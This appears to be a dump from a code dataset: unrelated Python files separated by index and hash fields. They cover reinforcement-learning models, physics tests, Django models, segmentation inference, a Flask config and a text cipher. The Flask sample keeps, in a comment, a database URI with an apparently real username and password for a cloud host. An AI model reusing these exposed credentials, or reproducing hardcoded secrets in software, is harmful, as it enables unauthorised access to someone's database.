self.h_out, self.w_out = conv2d_out_dims(self.conv2, self.h_out, self.w_out)
self.conv3 = Conv2d(64, 128, 4, stride=2)
self.h_out, self.w_out = conv2d_out_dims(self.conv3, self.h_out, self.w_out)
self.conv4 = Conv2d(128, 128, 4, stride=2)
self.h_out, self.w_out = conv2d_out_dims(self.conv4, self.h_out, self.w_out)
self.out_channels = self.conv4.out_channels
self.flat_features = self.out_channels * self.h_out * self.w_out
logging.debug(f" h_in:{h_in}, w_in:{w_in}, h_out:{self.h_out}, w_out:{self.w_out}, flat_features:{self.flat_features}")
def forward(self, x): # TODO: Simon uses leaky relu instead of relu, see what works best
# logging.debug(f" forward, shape x :{x.shape}")
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
flat_features = num_flat_features(x)
assert flat_features == self.flat_features, f"x.shape:{x.shape}, flat_features:{flat_features}, self.out_channels:{self.out_channels}, self.h_out:{self.h_out}, self.w_out:{self.w_out}"
x = x.view(-1, flat_features)
return x
class TM20CNNModule(Module):
def __init__(self, observation_space, action_space, is_q_network, act_buf_len=0):
super().__init__()
assert isinstance(observation_space, gym.spaces.Tuple)
# torch.autograd.set_detect_anomaly(True) # FIXME: remove for optimization
self.img_dims = observation_space[3].shape
self.vel_dim = observation_space[0].shape[0]
self.gear_dim = observation_space[1].shape[0]
self.rpm_dim = observation_space[2].shape[0]
self.is_q_network = is_q_network
self.act_buf_len = act_buf_len
self.act_dim = action_space.shape[0]
logging.debug(f" self.img_dims: {self.img_dims}")
h_in = self.img_dims[2]
w_in = self.img_dims[3]
channels_in = self.img_dims[0] * self.img_dims[1] # successive images as channels
self.cnn = BigCNN(h_in=h_in, w_in=w_in, channels_in=channels_in)
dim_fc1_in = self.cnn.flat_features + self.vel_dim + self.gear_dim + self.rpm_dim
if self.is_q_network:
dim_fc1_in += self.act_dim
if self.act_buf_len:
dim_fc1_in += self.act_dim * self.act_buf_len
self.fc1 = Linear(dim_fc1_in, 512)
def forward(self, x):
# assert isinstance(x, tuple), f"x is not a tuple: {x}"
vel = x[0].float()
gear = x[1].float()
rpm = x[2].float()
ims = x[3].float()
im1 = ims[:, 0]
im2 = ims[:, 1]
im3 = ims[:, 2]
im4 = ims[:, 3]
# logging.debug(f" forward: im1.shape:{im1.shape}")
if self.act_buf_len:
all_acts = torch.cat((x[4:]), dim=1).float() # if q network, the last action will be act
else:
raise NotImplementedError
cat_im = torch.cat((im1, im2, im3, im4), dim=1) # cat on channel dimension # TODO : check device
h = self.cnn(cat_im)
h = torch.cat((h, vel, gear, rpm, all_acts), dim=1)
h = self.fc1(h) # No ReLU here because this is done in the Sequential
return h
class TMActionValue(Sequential):
def __init__(self, observation_space, action_space, act_buf_len=0):
super().__init__(
TM20CNNModule(observation_space, action_space, is_q_network=True, act_buf_len=act_buf_len),
ReLU(),
Linear(512, 256),
ReLU(),
Linear(256, 2) # we separate reward components
)
# noinspection PyMethodOverriding
def forward(self, obs, action):
x = (*obs, action)
res = super().forward(x)
# logging.debug(f" av res:{res}")
return res
class TMPolicy(Sequential):
def __init__(self, observation_space, action_space, act_buf_len=0):
super().__init__(TM20CNNModule(observation_space, action_space, is_q_network=False, act_buf_len=act_buf_len), ReLU(), Linear(512, 256), ReLU(), TanhNormalLayer(256, action_space.shape[0]))
# noinspection PyMethodOverriding
def forward(self, obs):
# res = super().forward(torch.cat(obs, 1))
res = super().forward(obs)
# logging.debug(f" po res:{res}")
return res
class Tm_hybrid_1(ActorModule):
def __init__(self, observation_space, action_space, hidden_units: int = 512, num_critics: int = 2, act_buf_len=0):
super().__init__()
assert isinstance(observation_space, gym.spaces.Tuple), f"{observation_space} is not a spaces.Tuple"
self.critics = ModuleList(TMActionValue(observation_space, action_space, act_buf_len=act_buf_len) for _ in range(num_critics))
self.actor = TMPolicy(observation_space, action_space, act_buf_len=act_buf_len)
self.critic_output_layers = [c[-1] for c in self.critics]
|
5,678 | 82e7e22293551e061dcb295c52714c22df0ed0ce | class tenDParameters:
def __init__(self,
b: float,
DM: float,
pm_l: float,
pm_b: float,
vrad: float,
sb: float,
spml: float,
spmb: float,
sdm: float,
vc: float):
self.b = b
self.DM = DM
# this is actually pm_l * cos b, apparently
self.pm_l = pm_l
self.pm_b = pm_b
self.vrad = vrad
self.sb = sb
self.spml = spml
self.spmb = spmb
self.sdm = sdm
self.vc = vc |
5,679 | c36adc3cf5de2f0ae3ee9b9823304df393ebce63 | """
code: pmap_io_test.py
"""
import os
import time
import tables as tb
import numpy as np
from pytest import mark
from .. core.system_of_units_c import units
from .. database import load_db
from .. sierpe import blr
from . import tbl_functions as tbl
from . import peak_functions as pf
from . import peak_functions_c as cpf
from . params import S12Params as S12P
from . params import ThresholdParams
from . params import PMaps
from . pmap_io import pmap_writer
from . pmap_io import S12
from . pmap_io import S2Si
from . pmaps_functions import read_pmaps
from . pmaps_functions import read_run_and_event_from_pmaps_file
from . pmaps_functions_c import df_to_pmaps_dict
from . pmaps_functions_c import df_to_s2si_dict
@mark.parametrize( 'filename, with_',
(('test_pmaps_auto.h5', True),
('test_pmaps_manu.h5', False)))
def test_pmap_writer(config_tmpdir, filename, with_,
s12_dataframe_converted,
s2si_dataframe_converted):
PMP_file_name = os.path.join(str(config_tmpdir), filename)
# Get test data
s12, a = s12_dataframe_converted
s2si, b = s2si_dataframe_converted
P = PMaps(s12, s12, s2si) # TODO Remove duplication of s12
event_numbers = sorted(set(s12).union(set(s2si)))
timestamps = { e : int(time.time() % 1 * 10 ** 9) for e in event_numbers }
run_number = 632
# The actual pmap writing: the component whose functionality is
# being tested here.
# Two different ways of using pmap_writer (both tested by
# different parametrizations of this test)
if with_: # Close implicitly with context manager
with pmap_writer(PMP_file_name) as write:
for e in event_numbers:
timestamp = timestamps[e]
s1 = S12 (P.S1 .get(e, {}) )
s2 = S12 (P.S2 .get(e, {}) )
s2si = S2Si(P.S2Si.get(e, {}) )
write(run_number, e, timestamp, s1, s2, s2si)
else: # Close manually
write = pmap_writer(PMP_file_name)
for e in event_numbers:
timestamp = timestamps[e]
s1 = S12 (P.S1 .get(e, {}) )
s2 = S12 (P.S2 .get(e, {}) )
s2si = S2Si(P.S2Si.get(e, {}) )
write(run_number, e, timestamp, s1, s2, s2si)
write.close()
# Read back the data we have just written
s1df, s2df, s2sidf = read_pmaps(PMP_file_name)
rundf, evtdf = read_run_and_event_from_pmaps_file(PMP_file_name)
# Convert them into our transient format
S1D = df_to_pmaps_dict (s1df)
S2D = df_to_pmaps_dict (s2df)
S2SiD = df_to_s2si_dict(s2sidf)
######################################################################
# Compare original data to those read back
# The S12s
for original_S, recovered_S in zip(( S1D, S2D),
(P.S1, P.S2)):
for event_no, event in recovered_S.items():
for peak_no, recovered_peak in event.items():
original_peak = original_S[event_no][peak_no]
np.testing.assert_allclose(recovered_peak.t, original_peak.t)
np.testing.assert_allclose(recovered_peak.E, original_peak.E)
# The S2Sis
for event_no, event in S2SiD.items():
for peak_no, peak in event.items():
for sipm_id, recovered_Es in peak.items():
original_Es = P.S2Si[event_no][peak_no][sipm_id]
np.testing.assert_allclose(recovered_Es, original_Es)
# Event numbers
np.testing.assert_equal(evtdf.evt_number.values,
np.array(event_numbers, dtype=np.int32))
# Run numbers
np.testing.assert_equal(rundf.run_number.values,
np.full(len(event_numbers), run_number, dtype=np.int32))
@mark.slow
def test_pmap_electrons_40keV(config_tmpdir):
# NB: avoid taking defaults for PATH_IN and PATH_OUT
# since they are in general test-specific
# NB: avoid taking defaults for run number (test-specific)
RWF_file_name = os.path.join(os.environ['ICDIR'],
'database/test_data/',
'electrons_40keV_z250_RWF.h5')
PMAP_file_name = os.path.join(str(config_tmpdir),
'electrons_40keV_z250_PMP.h5')
s1_params = S12P(tmin=90*units.mus,
tmax=110*units.mus,
lmin=4,
lmax=20,
stride=4,
rebin=False)
s2_params = S12P(tmin=110*units.mus,
tmax=1190*units.mus,
lmin=80,
lmax=200000,
stride=40,
rebin=True)
thr = ThresholdParams(thr_s1=0.2*units.pes,
thr_s2=1*units.pes,
thr_MAU=3*units.adc,
thr_sipm=5*units.pes,
thr_SIPM=20*units.pes)
run_number = 0
with tb.open_file(RWF_file_name,'r') as h5rwf:
with pmap_writer(PMAP_file_name) as write:
#waveforms
pmtrwf, pmtblr, sipmrwf = tbl.get_vectors(h5rwf)
# data base
DataPMT = load_db.DataPMT(run_number)
pmt_active = np.nonzero(DataPMT.Active.values)[0].tolist()
adc_to_pes = abs(DataPMT.adc_to_pes.values)
coeff_c = abs(DataPMT.coeff_c.values)
coeff_blr = abs(DataPMT.coeff_blr.values)
DataSiPM = load_db.DataSiPM()
adc_to_pes_sipm = DataSiPM.adc_to_pes.values
# number of events
NEVT = pmtrwf.shape[0]
# number of events for test (at most NEVT)
NTEST = 2
# loop
XS1L = []
XS2L = []
XS2SiL = []
for event in range(NTEST):
# deconv
CWF = blr.deconv_pmt(pmtrwf[event], coeff_c, coeff_blr, pmt_active)
# calibrated sum
csum, csum_mau = cpf.calibrated_pmt_sum(CWF,
adc_to_pes,
pmt_active = pmt_active,
n_MAU=100,
thr_MAU=thr.thr_MAU)
# zs sum
s2_ene, s2_indx = cpf.wfzs(csum, threshold=thr.thr_s2)
s2_t = cpf.time_from_index(s2_indx)
s1_ene, s1_indx = cpf.wfzs(csum_mau, threshold=thr.thr_s1)
s1_t = cpf.time_from_index(s1_indx)
# S1 and S2
s1 = cpf.find_S12(s1_ene, s1_indx, **s1_params._asdict())
s2 = cpf.find_S12(s2_ene, s2_indx, **s2_params._asdict())
#S2Si
sipm = cpf.signal_sipm(sipmrwf[event],
adc_to_pes_sipm,
thr=thr.thr_sipm,
n_MAU=100)
SIPM = cpf.select_sipm(sipm)
s2si = pf.sipm_s2_dict(SIPM, s2, thr=thr.thr_SIPM)
# tests:
# energy vector and time vector equal in S1 and s2
assert len(s1[0][0]) == len(s1[0][1])
assert len(s2[0][0]) == len(s2[0][1])
if s2 and s2si:
for nsipm in s2si[0]:
assert len(s2si[0][nsipm]) == len(s2[0][0])
# make S1, S2 and S2Si objects (from dicts)
S1 = S12(s1)
S2 = S12(s2)
Si = S2Si(s2si)
# store in lists for further testing
XS1L.append(s1)
XS2L.append(s2)
XS2SiL.append(s2si)
# produce a fake timestamp (in real like comes from data)
timestamp = int(time.time())
# write to file
write(run_number, event, timestamp, S1, S2, Si)
# Read back
s1df, s2df, s2sidf = read_pmaps(PMAP_file_name)
rundf, evtdf = read_run_and_event_from_pmaps_file(PMAP_file_name)
# get the dicts
S1L = df_to_pmaps_dict(s1df)
S2L = df_to_pmaps_dict(s2df)
S2SiL = df_to_s2si_dict(s2sidf)
#test
for event in range(len(XS1L)):
s1 = XS1L[event]
if s1: # dictionary not empty
s1p = S1L[event]
for peak_number in s1p:
np.testing.assert_allclose(s1p[peak_number].t,
s1[peak_number][0])
np.testing.assert_allclose(s1p[peak_number].E,
s1[peak_number][1])
s2 = XS2L[event]
if s2:
s2p = S2L[event]
for peak_number in s2p:
np.testing.assert_allclose(s2p[peak_number].t,
s2[peak_number][0])
np.testing.assert_allclose(s2p[peak_number].E,
s2[peak_number][1])
s2si = XS2SiL[event]
if s2si:
sip = S2SiL[event]
for peak_number in sip:
sipm = sip[peak_number]
sipm2 = s2si[peak_number]
for nsipm in sipm:
np.testing.assert_allclose(sipm[nsipm], sipm2[nsipm])
|
5,680 | d123083358a4fd69f6f8de27fa177afac3bf80ce | from functools import update_wrapper
from django.db import models
# Create your models here.
class Product(models.Model):
product_id=models.AutoField
product_name=models.CharField(max_length=50)
category=models.CharField(max_length=50,default="")
subcategory=models.CharField(max_length=50,default="")
desc=models.CharField(max_length=300)
price=models.IntegerField(default=0)
pub_date=models.DateField()
image=models.ImageField(upload_to='shop/images',default="")
def __str__(self):
return self.product_name
class Contact(models.Model):
msg_id=models.AutoField(primary_key=True)
name=models.CharField(max_length=50,default="")
email=models.CharField(max_length=50,default="")
desc=models.CharField(max_length=1000,default="")
phone=models.CharField(max_length=50,default="")
def __str__(self):
return self.name
class Order(models.Model):
order_id=models.AutoField(primary_key=True)
item_json=models.CharField(max_length=10000,default="")
name=models.CharField(max_length=100,default="")
email=models.CharField(max_length=100,default="")
address=models.CharField(max_length=100,default="")
locality=models.CharField(max_length=50,default="")
city=models.CharField(max_length=1000,default="")
state=models.CharField(max_length=1000,default="")
zip=models.CharField(max_length=1000,default="")
phone=models.CharField(max_length=1000,default="")
class OrderUpdate(models.Model):
update_id=models.AutoField(primary_key=True);
order_id=models.IntegerField(default=0)
update_desc=models.CharField(max_length=50000,default="")
timestamp=models.DateField(auto_now_add=True)
def __str__(self):
return self.update_desc[0:7] + "..."
|
5,681 | 44e1208a2165fe68f71d0aa49baa29b26c961e02 | import pandas as pd
import copy as cp
import numpy as np
from autoencoder import *
from encoding import smtEncoding
import matplotlib
import matplotlib.pyplot as plt
from data_generator import *
from marabou_encoding import marabouEncoding
def main():
'''
Trains an autoencoder on (generated) data and checks adversarial robustness
'''
architecture = [10,5,10] # Change the architecture of the autoencoder according to requirement
print('----------Training autoencoder----------')
aut = autoencoder(architecture=architecture)
data = pd.read_csv('datasets/sine_curve.csv', header=None)
aut.train(data, epochs=20, learning_rate=0.01)
if not aut.saveflag:
aut.saveAE()
print("Saving the autoencoder after training")
#plot_output([data, aut.predict(data)], ['Original', 'Reconstructed'])
print("------Checking properties of autoencoders-------")
# Parameters that can be modified
boundingBox = 1 # Region around origin where the properties need to checked
prop1 = ['adversarial-example', 0.1]
prop2 = ['adversarial-robustness', [1]*10, 0.1, 0.1]
prop3 = ['fairness', 1, 0.1]
enc = smtEncoding()
counterExample = enc.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1)
# For marabou
mara = marabouEncoding()
mara.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1, folder = "Demo-aut/autoencoder.onnx")
if counterExample == None:
print("Autoencoder satisfies property is the given region")
else:
print("Autoencoder does not satisfy property in the given region for", counterExample)
main()
|
5,682 | 3ff3b8a1d8e74c09da9d6f39e4abf0963002a812 | #!/usr/bin/python
import sys
import cgi
import urllib2
url = sys.argv[1]
try:
response = urllib2.urlopen(url)
redir = response.geturl()
except Exception:
import traceback
redir = 'generic exception: ' + traceback.format_exc()
print redir
|
5,683 | 2044140fb2678f9507946007fdfb7edbaf11798e | from random import shuffle
"""all sorting algorithm implementation"""
class Sorts:
def quick_sort(self, elements):
"""quick sort implementation"""
if len(elements) < 2:
return elements
else:
shuffle(elements)
pivot = elements[0]
print("pivot is : ", pivot)
less = [i for i in elements[1:] if i <= pivot]
more = [i for i in elements[1:] if i > pivot]
return self.quick_sort(less) + [pivot] + self.quick_sort(more)
|
5,684 | 0c14a6fa8b25e1791a6eb9c71290db8bb316819a | # https://kyu9341.github.io/algorithm/2020/03/11/algorithm14226/
# https://developingbear.tistory.com/138
# https://devbelly.tistory.com/108
# 이모티콘 s개 생성
# 3가지 연산 이용
# bfs 이용 => visited를 이모티콘 방문 여부 2차원 배열 => 이모티콘의 수 와 클립보드에 저장된 이모티콘의 갯수를 이용
from collections import deque
s = int(input())
q = deque()
# visited[이모티콘의 수][클리보드의 이모티콘 수]
visited = [[False] * 1001 for _ in range(1001)]
visited[1][0] = True
# 이모티콘의 수, 클립보드의 수, 시간
q.append((1, 0, 0))
while q:
e, clip, t = q.popleft()
if e == s:
print(t)
exit(0)
if 0 < e < 1001:
if visited[e][e] is False:
visited[e][e] = True
q.append((e, e, t + 1))
# clip이 0 이상 조건이 필요없음 어차피 위에서 e가 0보다 큰걸로 조건 수행했으므로
if e + clip < 1001 and visited[e + clip][clip] is False:
visited[e + clip][clip] = True
q.append((e + clip, clip, t + 1))
# e가 1000을 넘을때만 수행하는 것이 아닌 모든 경우에 대해서 탐색을 하기 위해서 e에 대한 조건을 걸지 않음
if visited[e - 1][clip] is False:
visited[e - 1][clip] = True
q.append((e - 1, clip, t + 1))
|
5,685 | 9594cda360847d2878aa2bd9c9c85fe50562b6ab | #!/usr/bin/python
import json, sys, getopt, re
# Usage: ./get_code.py -i <inputfile>
def main(argv):
inputfile = argv[0]
with open(inputfile) as json_data:
d=json.load(json_data)
json_data.close()
code_array = d["hits"]["hits"]
output_json = []
for element in code_array:
gistid = element["_id"]
e = element["_source"]
code = e["code"].encode('ascii', 'ignore')
author = e["userId"]
code = get_js_only(code)
if(code != None):
filename = 'data/' + author + '_' + gistid + '.html'
outfile = open(filename, 'w')
outfile.write(code)
simple_e = {}
simple_e["uid"] = author + '_' + gistid
simple_e["created_at"] = e["created_at"]
simple_e["updated_at"] = e["updated_at"]
simple_e["api"] = e["api"]
simple_e["readme"] = e["readme"]
simple_e["description"] = e["description"]
simple_e["code"] = code # e["code"]
output_json.append(simple_e)
print len(output_json)
with open('nodes.json', 'w') as datafile:
json.dump(output_json, datafile)
def get_js_only(code):
re.DOTALL
re.MULTILINE
match = re.search('<script>.*</script>', code, re.DOTALL)
if(match != None):
return match.group(0)
else:
# print "\n\n-------------------------------------------------------------"
# print code
return None
if __name__ == "__main__":
main(sys.argv[1:]) |
5,686 | 6591ad20d4a07f29f22b50b6e8998c51e53600d6 | def getArticle():
text = []
idx = 1
with open('article.txt','r') as f:
data = f.readlines()
for i in data:
if i != '\n':
s = "{ 'id':" + str(idx) + "," + "'text':" + i.rstrip() + " }"
text.append(s)
idx+=1
return text
a = getArticle()
print a
'''
create a list of 100 words article
use javascript to display those article when start is hit.
change to the next article
'''
|
5,687 | 559e46aa4e9b55f8c01acf30fa01e106ab914116 | # -*- coding: utf-8 -*-
"""
.. codeauthor:: Daniel Seichter <daniel.seichter@tu-ilmenau.de>
"""
import argparse
from glob import glob
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
import torch
import torch.nn.functional as F
from src.args import ArgumentParserRGBDSegmentation
from src.build_model import build_model
from src.prepare_data import prepare_data
HOME = os.environ["HOME"]
def _load_img(fp):
img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)
if img.ndim == 3:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
return img
if __name__ == "__main__":
# arguments
parser = ArgumentParserRGBDSegmentation(
description="Efficient RGBD Indoor Sematic Segmentation (Inference)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--data_root",
type=str,
default=HOME + "/bags/june_25th/kinect_rgbd_person_act",
help="Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth",
)
parser.set_common_args()
parser.add_argument(
"--ckpt_path",
type=str,
default="trained_models/nyuv2/r34_NBt1D_scenenet.pth",
# default="trained_models/sunrgbd/r34_NBt1D.pth",
help="Path to the checkpoint of the trained model.",
)
parser.add_argument(
"--depth_scale",
type=float,
default=1.0,
help="Additional depth scaling factor to apply.",
)
args = parser.parse_args()
# dataset
# TODO: set dataset to be sunrgbd
# args.dataset = "sunrgbd"
args.pretrained_on_imagenet = False # we are loading other weights anyway
dataset, preprocessor = prepare_data(args, with_input_orig=True)
n_classes = dataset.n_classes_without_void
# model and checkpoint loading
model, device = build_model(args, n_classes=n_classes)
checkpoint = torch.load(args.ckpt_path, map_location=lambda storage, loc: storage)
model.load_state_dict(checkpoint["state_dict"])
print("Loaded checkpoint from {}".format(args.ckpt_path))
model.eval()
model.to(device)
# get samples
rgb_filepaths = sorted(glob(os.path.join(args.data_root, "color/*.jpg")))
depth_filepaths = sorted(glob(os.path.join(args.data_root, "depth/*.png")))
assert args.modality == "rgbd", "Only RGBD inference supported so far"
assert len(rgb_filepaths) == len(depth_filepaths)
filepaths = zip(rgb_filepaths, depth_filepaths)
# inference
for fp_rgb, fp_depth in filepaths:
# load sample
img_rgb = _load_img(fp_rgb)
img_depth = _load_img(fp_depth).astype("float32") * args.depth_scale
h, w, _ = img_rgb.shape
# preprocess sample
sample = preprocessor({"image": img_rgb, "depth": img_depth})
# add batch axis and copy to device
image = sample["image"][None].to(device)
depth = sample["depth"][None].to(device)
# apply network
pred = model(image, depth)
pred = F.interpolate(pred, (h, w), mode="bilinear", align_corners=False)
pred = torch.argmax(pred, dim=1)
pred = pred.cpu().numpy().squeeze().astype(np.uint8)
# show result
pred_colored = dataset.color_label(pred, with_void=False)
fig, axs = plt.subplots(1, 3, figsize=(16, 3))
[ax.set_axis_off() for ax in axs.ravel()]
axs[0].imshow(img_rgb)
axs[1].imshow(img_depth, cmap="gray")
axs[2].imshow(pred_colored)
plt.suptitle(
f"Image: ({os.path.basename(fp_rgb)}, "
f"{os.path.basename(fp_depth)}), Model: {args.ckpt_path}"
)
# plt.savefig('./result.jpg', dpi=150)
plt.show()
|
5,688 | d8d0c181fcfc9e0692369cc7a65259c43a68e931 | #
# struct_test.py
# Nazareno Bruschi <nazareno.bruschi@unibo.it>
#
# Copyright (C) 2019-2020 University of Bologna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
PULPNNInstallPath = cwd = os.getcwd() + "/../"
PULPNNSrcDirs = {'script': PULPNNInstallPath + "scripts/"}
PULPNNInstallPath32bit = cwd = os.getcwd() + "/../32bit/"
PULPNNInstallPath64bit = cwd = os.getcwd() + "/../64bit/"
PULPNNTestFolder32bit = PULPNNInstallPath32bit + "test/"
PULPNNTestFolder64bit = PULPNNInstallPath64bit + "test/"
PULPNNSrcDirs32bit = {'pulp_nn_inc': PULPNNInstallPath32bit + "include/",
'pulp_nn_pointwise_convolution': PULPNNInstallPath32bit + "src/StandardConvolutions/",
'pulp_nn_matmul': PULPNNInstallPath32bit + "src/MatrixMultiplications/",
'pulp_nn_depthwise_convolution': PULPNNInstallPath32bit + "src/DepthwiseConvolutions/",
'pulp_nn_linear_convolution_nq': PULPNNInstallPath32bit + "src/LinearConvolutionsNoQuant/",
'pulp_nn_linear_convolution_q': PULPNNInstallPath32bit + "src/LinearConvolutionsQuant/",
'pulp_nn_support_function': PULPNNInstallPath32bit + "src/SupportFunctions/",
'include': PULPNNTestFolder32bit + "include/",
'src': PULPNNTestFolder32bit + "src/",
'pointwise_convolution': PULPNNTestFolder32bit + "src/StandardConvolutions/",
'matmul': PULPNNTestFolder32bit + "src/MatrixMultiplications/",
'depthwise_convolution': PULPNNTestFolder32bit + "src/DepthwiseConvolutions/",
'linear_convolution_nq': PULPNNTestFolder32bit + "src/LinearConvolutionsNoQuant/",
'linear_convolution_q': PULPNNTestFolder32bit + "src/LinearConvolutionsQuant/",
'support_function': PULPNNTestFolder32bit + "src/SupportFunctions/",
'data_allocation_pw': PULPNNTestFolder32bit + "include/DataAllocationStandardConvolutions/",
'data_allocation_dw': PULPNNTestFolder32bit + "include/DataAllocationDepthwiseConvolutions/",
'data_allocation_ln_nq': PULPNNTestFolder32bit + "include/DataAllocationLinearConvolutionsNoQuant/",
'data_allocation_ln_q': PULPNNTestFolder32bit + "include/DataAllocationLinearConvolutionsQuant/",
'golden_model_pw': PULPNNTestFolder32bit + "include/GoldenModelStandardConvolutions/",
'golden_model_dw': PULPNNTestFolder32bit + "include/GoldenModelDepthwiseConvolutions/",
'golden_model_ln_nq': PULPNNTestFolder32bit + "include/GoldenModelLinearConvolutionsNoQuant/",
'golden_model_ln_q': PULPNNTestFolder32bit + "include/GoldenModelLinearConvolutionsQuant/",
'test': PULPNNTestFolder32bit}
PULPNNSrcDirs64bit = {'pulp_nn_inc': PULPNNInstallPath64bit + "include/",
'pulp_nn_pointwise_convolution': PULPNNInstallPath64bit + "src/StandardConvolutions/",
'pulp_nn_matmul': PULPNNInstallPath64bit + "src/MatrixMultiplications/",
'pulp_nn_depthwise_convolution': PULPNNInstallPath64bit + "src/DepthwiseConvolutions/",
'pulp_nn_linear_convolution_nq': PULPNNInstallPath64bit + "src/LinearConvolutionsNoQuant/",
'pulp_nn_linear_convolution_q': PULPNNInstallPath64bit + "src/LinearConvolutionsQuant/",
'pulp_nn_support_function': PULPNNInstallPath64bit + "src/SupportFunctions/",
'include': PULPNNTestFolder64bit + "include/",
'src': PULPNNTestFolder64bit + "src/",
'pointwise_convolution': PULPNNTestFolder64bit + "src/StandardConvolutions/",
'matmul': PULPNNTestFolder64bit + "src/MatrixMultiplications/",
'depthwise_convolution': PULPNNTestFolder64bit + "src/DepthwiseConvolutions/",
'linear_convolution_nq': PULPNNTestFolder64bit + "src/LinearConvolutionsNoQuant/",
'linear_convolution_q': PULPNNTestFolder64bit + "src/LinearConvolutionsQuant/",
'support_function': PULPNNTestFolder64bit + "src/SupportFunctions/",
'data_allocation_pw': PULPNNTestFolder64bit + "include/DataAllocationStandardConvolutions/",
'data_allocation_dw': PULPNNTestFolder64bit + "include/DataAllocationDepthwiseConvolutions/",
'data_allocation_ln_nq': PULPNNTestFolder64bit + "include/DataAllocationLinearConvolutionsNoQuant/",
'data_allocation_ln_q': PULPNNTestFolder64bit + "include/DataAllocationLinearConvolutionsQuant/",
'golden_model_pw': PULPNNTestFolder64bit + "include/GoldenModelStandardConvolutions/",
'golden_model_dw': PULPNNTestFolder64bit + "include/GoldenModelDepthwiseConvolutions/",
'golden_model_ln_nq': PULPNNTestFolder64bit + "include/GoldenModelLinearConvolutionsNoQuant/",
'golden_model_ln_q': PULPNNTestFolder64bit + "include/GoldenModelLinearConvolutionsQuant/",
'test': PULPNNTestFolder64bit} |
5,689 | 7b45c9e31bfb868b1abde6af0d8579b52f86d9c3 | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from subprocess import call
app = Flask(__name__)
app.config['SECRET_KEY'] = "SuperSecretKey"
#app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://fmnibhaashbxuy:73b8e2e2485adfd45f57da653d63950b88fdcae12202a84f80c7f4c297e9e30a@ec2-23-23-222-184.compute-1.amazonaws.com:5432/d27ig8fpt4ch7r"
app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://info2180-project1:password123@localhost/profilebook"
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True # added just to suppress a warning
app.config['UPLOAD_FOLDER'] = './app/static/profile_photo'
db = SQLAlchemy(app)
allowed_exts = ["jpg", "jpeg", "png"]
from app import views |
5,690 | 5dccd015a90927e8d2a9c0ea4b11b24bfd4bb65e | import os
import pprint
import math
import sys
import datetime as dt
from pathlib import Path
import RotateCipher
import ShiftCipher
import TranspositionCipher
def process_textfile(
string_path: str,
encryption_algorithm: str,
algorithm_key: float,
output_folderpath: str = str(
Path(os.path.expandvars("$HOME")).anchor
) + r"/EncryptDecrypt/",
output_filename: str = r"EncryptDecrypt.txt",
to_decrypt=False,
**kwargs
):
encryption_algorithm = encryption_algorithm.lower()
available_algorithms = ["rotate", "transposition"]
if encryption_algorithm not in available_algorithms:
pprint.pprint(
["Enter an algorithm from the list. Not case-sensitive.",
available_algorithms]
)
return None
# A single dictionary may be passed as a **kwarg if it is the
# ONLY KEY-WORD ARGUMENT. Else, error is thrown.
lst_kwargs = list(kwargs.values())
if len(lst_kwargs) == 1 and (isinstance(lst_kwargs[0], dict)):
kwargs = lst_kwargs[0]
# Key in **kwargs overwrites `algorithm_key` function parameter.
if "algorithm_key" in kwargs:
algorithm_key = float(kwargs["algorithm_key"])
# Convert strings saying "True" or "False" to booleans.
for key, value in kwargs.items():
str_value = str(value)
if str_value.lower() == "False":
kwargs[key] = False
elif str_value.lower() == "True":
kwargs[key] = True
output_filename = ('/' + output_filename)
if not (output_filename.endswith(".txt")):
output_filename += ".txt"
full_outputpath = output_folderpath + output_filename
path_input = Path(string_path)
# fileobj_target = open(path_input, 'r') # Only for Python 3.6 and later.
fileobj_target = open(str(path_input), 'r')
lst_input = fileobj_target.readlines()
# str_input = '\n'.join(lst_input)
str_input = "".join(lst_input)
output_string = "None"
print(
"""Started processing.
Key-word arguments for %s algorithm:""" % encryption_algorithm
)
pprint.pprint(kwargs)
if (encryption_algorithm == "transposition") and to_decrypt is True:
output_string = ''.join(
TranspositionCipher.decrypt_transposition(
str_input, int(algorithm_key)
)
)
elif encryption_algorithm == "transposition" and not to_decrypt:
output_string = ''.join(
TranspositionCipher.encrypt_transposition(
str_input, int(algorithm_key)
)
)
elif encryption_algorithm == "rotate":
warning = """
When the algorithm is set to rotate, the "to_decrypt" parameter
is ignored. To decrypt, set the key-word argument shift left
so that it reverses the shift direction during encryption.
Ex: If the text was shifted left, i.e. values were swapped
with those "higher" up on the list read from left to right, pass
the key-word argument shift_left=False to decrypt.
RotateCipher's methods can return a list. However, it is
forced to always return a string. Passing return_list=True as
a key-word argument will have no effect. The argument is not
passed to RotateCipher.
"""
# pprint.pprint(warning) # Included literl \n and single quotes.
print(warning)
to_shiftleft = True
if "shift_left" in kwargs:
to_shiftleft = kwargs["shift_left"]
process_numbers = False
if "shift_numbers" in kwargs:
process_numbers = kwargs["shift_numbers"]
output_string = RotateCipher.rot13_e(
string=str_input,
shift_left=to_shiftleft,
rotations=int(algorithm_key),
# return_list=kwargs["return_list"], # Removed for safety.
shift_numbers=process_numbers
)
if not (os.path.exists(output_folderpath)):
os.mkdir(output_folderpath)
fileobj_output = open(
full_outputpath,
'a' # Create a file and open it for writing. Append if exists.
)
fileobj_output.write(
"\n=====\nEncryptDecrypt Output on\n%s\n=====\n" %
dt.datetime.now()
)
fileobj_output.write(output_string)
fileobj_output.close()
print("Done processing. Output folder:\n{}".format(
Path(full_outputpath)
)
)
return {
"output_file": Path(full_outputpath).resolve(),
"output_text": output_string
}
def manual_test():
dict_processedtext = process_textfile(
